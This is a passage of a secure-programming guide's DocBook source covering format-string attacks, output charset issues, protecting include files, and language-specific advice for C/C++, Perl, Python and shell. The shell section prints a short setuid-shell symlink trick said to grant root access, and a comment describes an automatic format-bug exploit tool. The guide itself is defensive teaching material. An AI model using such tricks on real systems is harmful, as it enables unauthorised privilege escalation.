using this, an attacker can overwrite a value that was intended for printing!
|
||
An attacker can even overwrite almost arbitrary locations, since the attacker
|
||
can specify a ``parameter'' that wasn't actually passed.
|
||
The %n conversion specification has been standard part of C since its
|
||
beginning, is required by all C standards, and is used by real programs.
|
||
In 2000, Greg KH did a quick search of source code and identified the programs
|
||
BitchX (an irc client), Nedit (a program editor), and
|
||
SourceNavigator (a program editor / IDE / Debugger) as using %n, and there
|
||
are doubtless many more.
|
||
Deprecating %n would probably be a good idea, but even without %n there
|
||
can be significant problems.
|
||
<!--
|
||
Crispin Cowan posted the list at:
|
||
http://lists.insecure.org/lists/vuln-dev/2000/Sep/0050.html
|
||
Immediately added forgotten credit at:
|
||
http://lists.insecure.org/lists/vuln-dev/2000/Sep/0061.html
|
||
Greg KH mentions further:
|
||
http://lists.insecure.org/lists/vuln-dev/2000/Sep/0053.html
|
||
(He just searched some source code he had on hand).
|
||
|
||
-->
|
||
Many papers discuss these attacks in more detail, for example, you can see
|
||
<ulink url="http://www-syntim.inria.fr/fractales/Staff/Raynal/LinuxMag/SecProg/Art4/index.html">Avoiding security holes
|
||
when developing an application - Part 4: format strings</ulink>.
|
||
<!--
|
||
For a detailed description of how these format strings can be exploited,
|
||
see the following post on Bugtraq:
|
||
Subject: Howto exploit a remote format bug automatically
|
||
From: Fr<46>d<EFBFBD>ric Raynal frederic.raynal@inria.fr
|
||
Date: Thu, 18 Apr 2002 16:25:37 +0200
|
||
To: bugtraq@securityfocus.com
|
||
|
||
Also, see Fredrik Widlund (fredrik.widlund@defcom.com)'s "fox" program.
|
||
From the 19 April 2002 Bugtraq notice:
|
||
"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
|
||
locally and remotely. Runs on OpenBSD and not ported to other platforms,
|
||
though it should be very straighforward.
|
||
|
||
The only requirement is that you get the actual printed string back to the
|
||
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
|
||
small shell program since the output occurs in the process listing.
|
||
|
||
Should work for exploiting bugs on most little-endian 32bit-machines like the
|
||
i386 providing you supply the shellcode.
|
||
|
||
Includes a trivial local example, and an example of how to point it at the
|
||
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.
|
||
|
||
|
||
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
Since in many cases the results are sent back to the user,
|
||
this attack can also be used to expose internal information about the stack.
|
||
This information can then be used to circumvent stack protection systems
|
||
such as StackGuard and ProPolice; StackGuard uses constant ``canary'' values
|
||
to detect attacks, but if the stack's contents can be displayed,
|
||
the current value of the canary will be exposed, suddenly making the
|
||
software vulnerable again to stack smashing attacks.
|
||
<!-- Fri, 21 Jul 2000 12:21:20 -0400,
|
||
From: Alan DeKok <aland@STRIKER.OTTAWA.ON.CA>
|
||
Subject: StackGuard with ... Re: [Paper] Format bugs.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
A formatting string should almost always be a constant string,
|
||
possibly involving a function call to implement a
|
||
lookup for internationalization (e.g., via gettext's _()).
|
||
Note that this
|
||
lookup must be limited to values that the program controls, i.e., the
|
||
user must be allowed to only select from the message files controlled
|
||
by the program.
|
||
It's possible to filter user data before using it (e.g., by designing
|
||
a filter listing legal characters for the format string such as [A-Za-z0-9]),
|
||
but it's usually better to simply prevent the problem
|
||
by using a constant format string or fputs() instead.
|
||
Note that although I've listed this as an ``output'' problem, this can
|
||
cause problems internally to a program before output
|
||
(since the output routines may be saving to a file, or even just generating
|
||
internal state such as via snprintf()).
|
||
</para>
|
||
|
||
<para>
|
||
The problem of input formatting causing security problems
|
||
is not an idle possibility; see CERT Advisory CA-2000-13
|
||
for an example of an exploit using this weakness.
|
||
For more information on how these problems can be exploited, see
|
||
Pascal Bouchareine's email article titled ``[Paper] Format bugs'',
|
||
published in the July 18, 2000 edition of
|
||
<ulink url="http://www.securityfocus.com">Bugtraq</ulink>.
|
||
<!-- This paper can be hard to extract, but it's there -->
|
||
As of December 2000,
|
||
developmental versions of the gcc compiler support warning messages for
|
||
insecure format string usages, in an attempt to help developers avoid
|
||
these problems.
|
||
<!-- John Levon passed this information on to me; as of Dec 11, 2000, this
|
||
was in the CVS version of gcc -->
|
||
</para>
|
||
|
||
<para>
|
||
Of course, this all begs the question as to whether or not the
|
||
internationalization lookup is, in fact, secure.
|
||
If you're creating your own internationalization lookup routines,
|
||
make sure that an untrusted user can only specify a legal locale and not
|
||
something else like an arbitrary path.
|
||
</para>
|
||
|
||
<para>
|
||
Clearly, you want to limit the strings created through internationalization
|
||
to ones you can trust.
|
||
Otherwise, an attacker could use this ability to exploit the
|
||
weaknesses in format strings, particularly in C/C++ programs.
|
||
This has been an item of discussion in Bugtraq (e.g., see
|
||
John Levon's Bugtraq post on July 26, 2000).
|
||
For more information, see the discussion on
|
||
permitting users to only select legal language values in
|
||
<xref linkend="locale-legal-values">.
|
||
</para>
|
||
|
||
<para>
|
||
Although it's really a programming bug, it's worth mentioning that
|
||
different countries notate numbers in different ways, in particular,
|
||
both the period (.) and comma (,) are used to separate an integer
|
||
from its fractional part. If you save or load data, you need to make sure
|
||
that the active locale does not interfere with data handling.
|
||
Otherwise, a French user may not be able to exchange data with an
|
||
English user, because the data stored and retrieved will use
|
||
different separators.
|
||
I'm unaware of this being used as a security problem, but it's conceivable.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="output-character-encoding">
|
||
<title>Control Character Encoding in Output</title>
|
||
|
||
<para>
|
||
In general, a secure program must ensure that it synchronizes its
|
||
clients to any assumptions made by the secure program.
|
||
One issue often impacting web applications is that they forget to
|
||
specify the character encoding of their output.
|
||
This isn't a problem if all data is from trusted sources, but if
|
||
some of the data is from untrusted sources, the untrusted source may
|
||
sneak in data that uses a different encoding than the one expected
|
||
by the secure program.
|
||
This opens the door for a cross-site malicious content attack; see
|
||
<xref linkend="input-protection-cross-site"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
<ulink url="http://www.cert.org/tech_tips/malicious_code_mitigation.html">CERT's tech tip on malicious code mitigation</ulink> explains the problem
|
||
of unspecified character encoding fairly well, so I quote it here:
|
||
|
||
<blockquote>
|
||
<para>
|
||
Many web pages leave the character encoding
|
||
("charset" parameter in HTTP) undefined.
|
||
In earlier versions of HTML and HTTP, the character encoding
|
||
was supposed to default to ISO-8859-1 if it wasn't defined.
|
||
In fact, many browsers had a different default, so it was not possible
|
||
to rely on the default being ISO-8859-1.
|
||
HTML version 4 legitimizes this - if the character encoding isn't specified,
|
||
any character encoding can be used.
|
||
</para>
|
||
|
||
<para>
|
||
If the web server doesn't specify which character encoding is in use,
|
||
it can't tell which characters are special.
|
||
Web pages with unspecified character encoding work most of the time
|
||
because most character sets assign the same characters to byte values
|
||
below 128.
|
||
But which of the values above 128 are special?
|
||
Some 16-bit character-encoding schemes have additional
|
||
multi-byte representations for special characters such as "<".
|
||
Some browsers recognize this alternative encoding and act on it.
|
||
This is "correct" behavior, but it makes attacks using malicious scripts
|
||
much harder to prevent.
|
||
The server simply doesn't know which byte sequences
|
||
represent the special characters.
|
||
</para>
|
||
|
||
<para>
|
||
For example, UTF-7 provides alternative encoding for "<" and ">",
|
||
and several popular browsers recognize these as the start and end of a tag.
|
||
This is not a bug in those browsers.
|
||
If the character encoding really is UTF-7, then this is correct behavior.
|
||
The problem is that it is possible to get into a situation in which
|
||
the browser and the server disagree on the encoding.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
Thankfully, though explaining the issue is tricky, its resolution in HTML
|
||
is easy.
|
||
In the HTML header, simply specify the charset, like this example
|
||
from CERT:
|
||
<programlisting>
|
||
<HTML>
|
||
<HEAD>
|
||
<META http-equiv="Content-Type"
|
||
content="text/html; charset=ISO-8859-1">
|
||
<TITLE>HTML SAMPLE</TITLE>
|
||
</HEAD>
|
||
<BODY>
|
||
<P>This is a sample HTML page
|
||
</BODY>
|
||
</HTML>
|
||
</programlisting>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
From a technical standpoint,
|
||
an even better approach is to set the character encoding as part of
|
||
the HTTP protocol output, though some libraries make this more difficult.
|
||
This is technically better because it doesn't force the client to
|
||
examine the header to determine a character encoding that would enable it
|
||
to read the META information in the header.
|
||
Of course, in practice a browser that couldn't read the META information
|
||
given above and use it correctly would not succeed in the marketplace,
|
||
but that's a different issue.
|
||
In any case, this just means that the server would need to send
|
||
as part of the HTTP protocol, a ``charset'' with the desired value.
|
||
Unfortunately, it's hard to heartily recommend this (technically better)
|
||
approach, because some older HTTP/1.0 clients did not deal properly with
|
||
an explicit charset parameter.
|
||
<!-- This is documented in the HTTP 1.1 specification -->
|
||
Although the HTTP/1.1 specification requires clients to obey the parameter,
|
||
it's suspicious enough that you probably ought to use it as an
|
||
adjunct to forcing the use of the correct
|
||
character encoding, and not your sole mechanism.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="prevent-include-access">
|
||
<title>Prevent Include/Configuration File Access</title>
|
||
<!-- I was reminded of this by the Bugtraq posting of 1 Dec 2000
|
||
by Mads Bach (bach@INDER.NET), "Subject: Web based apps and include files" -->
|
||
|
||
<para>
|
||
When developing web based applications,
|
||
do not allow users to access (read) files such as the program include and
|
||
configuration files.
|
||
This data may provide enough information (e.g., passwords) to break into
|
||
the system.
|
||
Note that this guideline sometimes also applies to other kinds of applications.
|
||
There are several actions you can take to do this, including:
|
||
<itemizedlist>
|
||
<listitem><para>Place
|
||
the include/configuration files outside of the web documentation
|
||
root (so that the web server will never serve the files).
|
||
Really, this is the best approach unless there's some reason the
|
||
files have to be inside the document root.</para></listitem>
|
||
<listitem><para>Configure the web server so it will not serve include files as
|
||
text. For example, if you're using Apache,
|
||
you can add a handler or an action for .inc files like so:
|
||
<programlisting width="61">
|
||
<![CDATA[
|
||
<Files *.inc>
|
||
Order allow,deny
|
||
Deny from all
|
||
</Files>
|
||
]]>
|
||
</programlisting>
|
||
</para></listitem>
|
||
<listitem><para>Place the include files
|
||
in a protected directory (using .htaccess), and designate them as files
|
||
that won't be served.
|
||
<!-- Suggested by Dustin Rue in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
|
||
</para></listitem>
|
||
<listitem><para>Use a filter to deny access to the files.
|
||
For Apache, this can be done using:
|
||
<programlisting width="61">
|
||
<![CDATA[
|
||
<Files ~ "\.phpincludes">
|
||
Order allow,deny
|
||
Deny from all
|
||
</Files>
|
||
]]>
|
||
</programlisting>
|
||
If you need full regular expressions to match filenames, in Apache you
|
||
could use the FilesMatch directive.
|
||
<!-- Suggested by Julien Savoie and James Lyon
|
||
in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
|
||
</para></listitem>
|
||
<listitem><para>If your include file is a valid script file,
|
||
which your server will parse,
|
||
make sure that it doesn't act on user-supplied parameters and that it's
|
||
designed to be secure.</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
These approaches won't protect you from users who
|
||
have access to the directories your files are in if they are world-readable.
|
||
You could change the permissions of the files so
|
||
that only the uid/gid of the webserver can read these files.
|
||
However, this approach won't work if the user can get the web server to
|
||
run his own scripts (the user can just write scripts to access your files).
|
||
Fundamentally, if your site is being hosted on a server shared with
|
||
untrusted people, it's harder to secure the system.
|
||
One approach is to run multiple web serving programs, each with different
|
||
permissions; this provides more security but is painful in practice.
|
||
Another approach is to set these files to be read only by your uid/gid,
|
||
and have the server run scripts at ``your'' permission.
|
||
This latter approach has its own problems: it means that certain parts of
|
||
the server must have root privileges, and that the script may
|
||
have more permissions than necessary.
|
||
</para>
|
||
</sect1>
|
||
|
||
|
||
|
||
</chapter>
|
||
|
||
<chapter id="language-specific">
|
||
<title>Language-Specific Issues</title>
|
||
<epigraph>
|
||
<attribution>1 Corinthians 14:10 (NIV)</attribution>
|
||
<para>
|
||
Undoubtedly there are all sorts of languages in the world,
|
||
yet none of them is without meaning.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
There are many language-specific security issues.
|
||
Many of them can be summarized as follows:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Turn on all relevant warnings and protection mechanisms available to you
|
||
where practical.
|
||
For compiled languages, this includes
|
||
both compile-time mechanisms and run-time mechanisms.
|
||
In general, security-relevant programs should compile cleanly with
|
||
all warnings turned on.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
If you can use a ``safe mode'' (e.g., a mode that limits the activities
|
||
of the executable), do so.
|
||
Many interpreted languages include such a mode.
|
||
In general, don't depend on the safe mode to provide absolute protection;
|
||
most language's safe modes have not been sufficiently analyzed for their
|
||
security, and when they are, people usually discover many ways to exploit it.
|
||
However, by writing your code so that it's secure out of safe mode, and
|
||
then adding the safe mode, you end up with defense-in-depth (since in
|
||
many cases, an attacker has to break both
|
||
your application code and the safe mode).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Avoid dangerous and deprecated operations in the language.
|
||
By ``dangerous'', I mean operations which are difficult to use correctly.
|
||
For example, many languages include
|
||
some mechanisms or functions that are ``magical'', that
|
||
is, they try to infer the ``right'' thing to do using a heuristic -
|
||
generally you should avoid them, because an attacker may be able to
|
||
exploit the heuristic and do something dangerous instead of what was intended.
|
||
A common error is an ``off-by-one'' error, in which the bound is
|
||
off by one, and sometimes these result in exploitable errors.
|
||
In general, write code in a way that minimizes the likelihood of
|
||
off-by-one errors.
|
||
If there are standard conventions in the language (e.g., for writing loops),
|
||
use them.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Ensure that the languages'
|
||
infrastructure (e.g., run-time library) is available and secured.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Languages that automatically garbage-collect strings should be
|
||
especially careful to immediately erase secret data
|
||
(in particular secret keys and passwords).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Know precisely the semantics of the operations that you are using.
|
||
Look up each operation's semantics in its documentation.
|
||
Do not ignore return values unless you're sure they cannot be relevant.
|
||
Don't ignore the difference between ``signed'' and ``unsigned'' values.
|
||
This is particularly difficult in languages which don't support exceptions,
|
||
like C, but that's the way it goes.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<sect1 id="c-cpp">
|
||
<title>C/C++</title>
|
||
|
||
<para>
|
||
It is possible to develop secure code using C or C++, but both
|
||
languages include fundamental design decisions that make it
|
||
more difficult to write secure code.
|
||
C and C++ easily permit buffer overflows, force programmers to do their
|
||
own memory management, and are fairly lax in their typing systems.
|
||
For systems programs (such as an operating system kernel),
|
||
C and C++ are fine choices.
|
||
For applications, C and C++ are often over-used.
|
||
Strongly consider using an even higher-level language,
|
||
at least for the majority of the application.
|
||
But clearly, there are many existing programs in C and C++
|
||
which won't get completely rewritten, and many developers may choose
|
||
to develop in C and C++.
|
||
</para>
|
||
|
||
<para>
|
||
One of the biggest security problems with C and C++ programs is
|
||
buffer overflow; see <xref linkend="buffer-overflow">
|
||
for more information.
|
||
C has the additional weakness of not supporting exceptions, which makes
|
||
it easy to write programs that ignore critical error situations.
|
||
</para>
|
||
|
||
<para>
|
||
Another problem with C and C++ is that developers have to do their
|
||
own memory management (e.g., using malloc(), alloc(), free(), new, and delete),
|
||
and failing to do it correctly may result in a security flaw.
|
||
The more serious problem is that programs may erroneously
|
||
free memory that should not be freed (e.g., because it's already been freed).
|
||
This can result in an immediate crash or be exploitable, allowing
|
||
an attacker to cause arbitrary code to be executed; see
|
||
[Anonymous Phrack 2001].
|
||
Some systems (such as many GNU/Linux systems) don't protect
|
||
against double-freeing at all by default, and it is not clear that those
|
||
systems which attempt to protect themselves are truly unsubvertable.
|
||
Although I haven't seen anything written on the subject, I suspect that
|
||
using the incorrect call in C++ (e.g., mixing new and malloc()) could
|
||
have similar effects.
|
||
For example, on March 11, 2002, it was announced that the zlib
|
||
library had this problem, affecting the many programs that use it.
|
||
<!-- http://www.linuxsecurity.com/articles/security_sources_article-4582.html -->
|
||
Thus, when testing programs on GNU/Linux,
|
||
you should set the environment variable
|
||
MALLOC_CHECK_ to 1 or 2, and you might consider executing your program
|
||
with that environment variable set with 0, 1, 2.
|
||
The reason for this variable is explained in GNU/Linux malloc(3) man page:
|
||
<blockquote>
|
||
<para>
|
||
Recent versions of Linux libc (later than 5.4.23) and
|
||
GNU libc (2.x) include a malloc implementation which is tunable
|
||
via environment variables.
|
||
When MALLOC_CHECK_ is set, a special (less efficient) implementation
|
||
is used which is designed to be tolerant against simple errors,
|
||
such as double calls of free() with the same argument,
|
||
or overruns of a single byte (off-by-one bugs).
|
||
Not all such errors can be protected against, however, and memory leaks
|
||
can result.
|
||
If MALLOC_CHECK_ is set to 0, any detected heap corruption
|
||
is silently ignored;
|
||
if set to 1, a diagnostic is printed on stderr;
|
||
if set to 2, abort() is called immediately.
|
||
This can be useful because otherwise a crash may happen much later,
|
||
and the true cause for the problem is then very hard to track down.
|
||
</para>
|
||
</blockquote>
|
||
There are various tools to deal with this, such as
|
||
Electric Fence and Valgrind;
|
||
see <xref linkend="tools"> for more information.
|
||
If unused memory is not free'd, (e.g., using free()), that unused memory
|
||
may accumulate - and if enough unused memory can accumulate, the
|
||
program may stop working.
|
||
As a result, the unused memory may be exploitable by attackers to
|
||
create a denial of service.
|
||
It's theoretically possible for attackers to cause memory to be
|
||
fragmented and cause a denial of service, but usually this
|
||
is a fairly impractical and low-risk attack.
|
||
</para>
|
||
|
||
<para>
|
||
Be as strict as you reasonably can when you declare types.
|
||
Where you can, use ``enum'' to define enumerated values (and not
|
||
just a ``char'' or ``int'' with special values).
|
||
This is particularly useful for values in switch statements, where
|
||
the compiler can be used to determine if all legal values have been covered.
|
||
Where it's appropriate, use ``unsigned'' types if the value can't be
|
||
negative.
|
||
</para>
|
||
|
||
<para>
|
||
<!-- The example is from Sebastian (Bugtraq, 26 June 2000) -->
|
||
One complication in C and C++ is that the character type ``char'' can be
|
||
signed or unsigned (depending on the compiler and machine).
|
||
When a signed char with its high bit set
|
||
is saved in an integer, the result will be a negative number;
|
||
in some cases this can be exploitable.
|
||
In general, use ``unsigned char'' instead of char or signed char for
|
||
buffers, pointers, and casts when
|
||
dealing with character data that may have values greater than 127 (0x7f).
|
||
</para>
|
||
|
||
<para>
|
||
C and C++ are by definition rather lax in their type-checking support, but
|
||
you can at least increase their level of checking so that some mistakes
|
||
can be detected automatically.
|
||
Turn on as many compiler warnings as you can and change the code to cleanly
|
||
compile with them, and strictly use ANSI prototypes in separate header
|
||
(.h) files to ensure that all function calls use the correct types.
|
||
For C or C++ compilations using gcc, use at least
|
||
the following as compilation flags (which turn on a host of warning messages)
|
||
and try to eliminate all warnings (note that -O2 is used since some
|
||
warnings can only be detected by the data flow analysis performed at
|
||
higher optimization levels):
|
||
<screen width="61">
|
||
gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2
|
||
</screen>
|
||
You might want ``-W -pedantic'' too.
|
||
</para>
|
||
|
||
<para>
|
||
Many C/C++ compilers can detect inaccurate format strings.
|
||
For example,
|
||
gcc can warn about inaccurate format strings for functions you create
|
||
if you use its __attribute__() facility (a C extension) to mark such functions,
|
||
and you can use that facility without making your code non-portable.
|
||
Here is an example of what you'd put in your header (.h) file:
|
||
<programlisting width="61">
|
||
/* in header.h */
|
||
#ifndef __GNUC__
|
||
# define __attribute__(x) /*nothing*/
|
||
#endif
|
||
|
||
extern void logprintf(const char *format, ...)
|
||
__attribute__((format(printf,1,2)));
|
||
extern void logprintva(const char *format, va_list args)
|
||
__attribute__((format(printf,1,0)));
|
||
</programlisting>
|
||
The "format" attribute takes either "printf" or "scanf", and the numbers
|
||
that follow are the parameter number of the format string and the first
|
||
variadic parameter (respectively). The GNU docs talk about this well.
|
||
Note that there are other __attribute__ facilities as well,
|
||
such as "noreturn" and "const".
|
||
<!-- The __attribute__ discussion
|
||
Derived from "Stephen J. Friedl", Sat, 22 Jul 2000 16:21:08 -0700,
|
||
Bugtraq -->
|
||
</para>
|
||
|
||
<para>
|
||
Avoid common errors made by C/C++ developers.
|
||
For example, be careful about not using ``='' when you mean ``==''.
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="perl">
|
||
<title>Perl</title>
|
||
<para>
|
||
Perl programmers should first read the man page perlsec(1),
|
||
which describes a number of issues involved with writing secure programs
|
||
in Perl.
|
||
In particular, perlsec(1) describes the ``taint'' mode, which most
|
||
secure Perl programs should use.
|
||
Taint mode is automatically enabled if the real and effective user or group
|
||
IDs differ, or you can use the -T command line flag
|
||
(use the latter if you're running on behalf of someone else, e.g.,
|
||
a CGI script).
|
||
Taint mode turns on various checks, such as checking
|
||
path directories to make sure they aren't writable by others.
|
||
</para>
|
||
|
||
<para>
|
||
The most obvious affect of taint mode, however, is that
|
||
you may not use data derived from outside your program to
|
||
affect something else outside your program by accident.
|
||
In taint mode,
|
||
all externally-obtained input is marked as ``tainted'', including
|
||
command line arguments, environment variables,
|
||
locale information (see perllocale(1)),
|
||
results of certain system calls (readdir, readlink,
|
||
the gecos field of getpw* calls), and all file input.
|
||
Tainted data may not be
|
||
used directly or indirectly in any command that invokes a
|
||
sub-shell, nor in any command that modifies files,
|
||
directories, or processes.
|
||
There is one important exception: If you
|
||
pass a list of arguments to either system or exec, the
|
||
elements of that list are NOT checked for taintedness, so
|
||
be especially careful with system or exec while in taint mode.
|
||
</para>
|
||
|
||
<para>
|
||
Any data value derived from tainted data becomes tainted also.
|
||
There is one exception to this; the way to untaint data is to
|
||
extract a substring of the tainted data.
|
||
Don't just use ``.*'' blindly as your substring, though, since this
|
||
would defeat the tainting mechanism's protections.
|
||
Instead, identify patterns that identify the ``safe'' pattern
|
||
allowed by your program, and use them to extract ``good'' values.
|
||
After extracting the value, you may still need to check it
|
||
(in particular for its length).
|
||
</para>
|
||
|
||
<para>
|
||
The open, glob, and backtick functions
|
||
call the shell to expand filename wild card characters; this
|
||
can be used to open security holes.
|
||
You can try to avoid these functions entirely, or use them in a
|
||
less-privileged ``sandbox'' as described in perlsec(1).
|
||
In particular, backticks should be rewritten using the system() call
|
||
(or even better, changed entirely to something safer).
|
||
</para>
|
||
|
||
<para>
|
||
The perl open() function comes with, frankly,
|
||
``way too much magic'' for most secure programs; it interprets text
|
||
that, if not carefully filtered, can create lots of security problems.
|
||
Before writing code to open or lock a file, consult the perlopentut(1)
|
||
man page.
|
||
In most cases, sysopen() provides a safer (though more convoluted)
|
||
approach to opening a file.
|
||
<ulink
|
||
url="http://www.xray.mpe.mpg.de/mailing-lists/perl5-porters/2000-03/msg02596.html">
|
||
The new Perl 5.6 adds an open() call
|
||
with 3 parameters to turn off the magic behavior
|
||
without requiring the convolutions of sysopen()</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Perl programs should turn on the warning flag (-w), which warns of
|
||
potentially dangerous or obsolete statements.
|
||
</para>
|
||
|
||
<para>
|
||
You can also run Perl programs in a restricted environment.
|
||
For more information see the ``Safe'' module in the standard Perl
|
||
distribution.
|
||
I'm uncertain of the amount of auditing that this has undergone,
|
||
so beware of depending on this for security.
|
||
You might also investigate the ``Penguin Model for
|
||
Secure Distributed Internet Scripting'', though at the time
|
||
of this writing the code and documentation seems to be unavailable.
|
||
<!-- Search for Penguin FAQ, the Penguin Model for Secure Distributed
|
||
Internet Scripting -->
|
||
</para>
|
||
|
||
<para>
|
||
Many installations include a setuid root version of perl named ``suidperl''.
|
||
However, the perldelta man page version 5.6.1 recommends using sudo
|
||
instead, stating the following:
|
||
<blockquote>
|
||
<para>
|
||
"Note that suidperl is neither built nor installed by default in
|
||
any recent version of perl.
|
||
Use of suidperl is highly discouraged.
|
||
If you think you need it, try alternatives such as sudo first.
|
||
See http://www.courtesan.com/sudo/".
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="python">
|
||
<title>Python</title>
|
||
<para>
|
||
As with any language,
|
||
beware of any functions which allow data to be executed as parts of
|
||
a program, to make sure an untrusted user can't affect their input.
|
||
This includes exec(), eval(), and execfile()
|
||
(and frankly, you should check carefully any call to compile()).
|
||
The input() statement is also surprisingly dangerous.
|
||
[Watters 1996, 150].
|
||
</para>
|
||
|
||
<para>
|
||
Python programs with privileges that can be invoked by unprivileged users
|
||
(e.g., setuid/setgid programs)
|
||
must <emphasis>not</emphasis> import the ``user'' module.
|
||
The user module causes the pythonrc.py file to be read and executed.
|
||
Since this file would be under the control of an untrusted user,
|
||
importing the user module allows an attacker to force the trusted
|
||
program to run arbitrary code.
|
||
</para>
|
||
|
||
<para>
|
||
Python does very little compile-time checking -- it has essentially
|
||
no compile-time type information, and it doesn't even check that the
|
||
number of parameters passed are legal for a given function or method.
|
||
This is unfortunate, resulting in a lot of latent bugs
|
||
(both John Viega and I have experienced this problem).
|
||
Hopefully someday Python will implement optional static typing and
|
||
type-checking, an idea that's been discussed for some time.
|
||
A partial solution for now is PyChecker, a lint-like program that
|
||
checks for common bugs in Python source code.
|
||
You can get PyChecker from
|
||
<ulink url="http://pychecker.sourceforge.net">http://pychecker.sourceforge.net</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
Python includes support for ``Restricted Execution'' through
|
||
its RExec class.
|
||
This is primarily intended for executing applets and mobile code, but
|
||
it can also be used to limit privilege in a program even when the
|
||
code has not been provided externally.
|
||
By default, a restricted execution
|
||
environment permits reading (but not writing) of files,
|
||
and does not include operations for network access or GUI interaction.
|
||
These defaults can be changed, but beware of creating loopholes in
|
||
the restricted environment.
|
||
In particular, allowing a user to unrestrictedly add attributes to a
|
||
class permits all sorts of ways to subvert the environment
|
||
because Python's implementation calls many ``hidden'' methods.
|
||
Note that, by default, most Python objects are passed by reference; if you
|
||
insert a reference to a mutable value into a restricted program's environment,
|
||
the restricted program can change the object in a way that's visible
|
||
outside the restricted environment!
|
||
Thus, if you want to give access to a mutable value, in many cases
|
||
you should copy the mutable value or use the Bastion module (which supports
|
||
restricted access to another object).
|
||
For more information, see
|
||
Kuchling [2000].
|
||
I'm uncertain of the amount of auditing that the restricted
|
||
execution capability has undergone, so programmer beware.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="shell">
|
||
<title>Shell Scripting Languages (sh and csh Derivatives)</title>
|
||
<para>
|
||
I strongly recommend against using
|
||
standard command shell scripting languages (such as csh, sh, and bash)
|
||
for setuid/setgid secure code.
|
||
Some systems (such as Linux) completely disable setuid/setgid
|
||
shell scripts, so creating setuid/setgid shell scripts creates
|
||
an unnecessary portability problem.
|
||
On some old systems they are fundamentally insecure due to a race condition
|
||
(as discussed in <xref linkend="process-creation">).
|
||
Even for other systems, they're not really a good idea.
|
||
</para>
|
||
|
||
<para>
|
||
In fact, there are a vast number of circumstances where shell scripting
|
||
languages shouldn't be used at all for secure programs.
|
||
Standard command shells are notorious for being affected by nonobvious inputs -
|
||
generally because command shells were designed to try to do
|
||
things ``automatically'' for an interactive user, not to defend against
|
||
a determined attacker.
|
||
Shell programs are fine for programs that don't need to be secure
|
||
(e.g., they run at the same privilege as the unprivileged
|
||
user and don't accept ``untrusted'' data).
|
||
They can also be useful when they're running with privilege, as long as
|
||
all the input (e.g., files, directories, command line, environment, etc.)
|
||
are all from trusted users - which is why they're
|
||
often used quite successfully in startup/shutdown scripts.
|
||
</para>
|
||
|
||
<para>
|
||
Writing secure shell programs in the presence of malicious
|
||
input is harder than in many other languages because
|
||
of all the things that shells are affected by.
|
||
For example,
|
||
``hidden'' environment variables (e.g., the ENV, BASH_ENV, and IFS values)
|
||
can affect how they operate or even execute arbitrary user-defined
|
||
code before the script can even execute.
|
||
Even things like filenames of the executable or directory contents can
|
||
affect execution.
|
||
If an attacker can create filenames containing
|
||
some control characters (e.g., newline),
|
||
or whitespace, or shell metacharacters, or begin with a dash
|
||
(the option flag syntax), there are often ways to exploit them.
|
||
For example, on many Bourne shell implementations, doing the following
|
||
will grant root access (thanks to NCSA for describing this
|
||
exploit):
|
||
<!-- http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming/#setuid-sh-exploit -->
|
||
<programlisting width="61">
|
||
% ln -s /usr/bin/setuid-shell /tmp/-x
|
||
% cd /tmp
|
||
% -x
|
||
</programlisting>
|
||
Some systems may have closed this hole, but the point still stands:
|
||
most command shells aren't intended for writing secure setuid/setgid programs.
|
||
For programming purposes, avoid creating setuid shell scripts, even
|
||
on those systems that permit them.
|
||
Instead, write a small program in another language to clean up the
|
||
environment, then have it call other executables (some of which
|
||
might be shell scripts).
|
||
</para>
|
||
|
||
<para>
|
||
If you still insist on using shell scripting languages, at least
|
||
put the script in a directory where it cannot be moved or changed.
|
||
Set PATH and IFS to known values very early in your script; indeed, the
|
||
environment should be cleaned before the script is called.
|
||
Also, very early on, ``cd'' to a safe directory.
|
||
Use data only from directories that is controlled by trusted users, e.g., /etc,
|
||
so that attackers can't insert maliciously-named files into those directories.
|
||
Be sure to quote every filename passed on a command line, e.g., use
|
||
"$1" not $1, because filenames with whitespace will be split.
|
||
Call commands using "--" to disable additional options where you can,
|
||
because attackers may create or pass filenames beginning with dash in the
|
||
hope of tricking the program into processing it as an option.
|
||
Be especially careful of filenames embedding other characters
|
||
(e.g., newlines and other control characters).
|
||
Examine input filenames especially carefully and be very restrictive
|
||
on what filenames are permitted.
|
||
</para>
|
||
|
||
<para>
|
||
If you don't mind limiting your program to only work with GNU tools
|
||
(or if you detect and optionally use the GNU tools instead when
|
||
they are available), you might want
|
||
to use NIL characters as the filename terminator instead of newlines.
|
||
By using NIL characters, rather than whitespace or newlines,
|
||
handling nasty filenames (e.g., those with
|
||
embedded newlines) is much simpler.
|
||
Several GNU tools that output or input filenames can use this format
|
||
instead of the more common ``one filename per line'' format.
|
||
Unfortunately, the name of this option isn't consistent between tools;
|
||
for many tools the name of this option is ``--null'' or ``-0''.
|
||
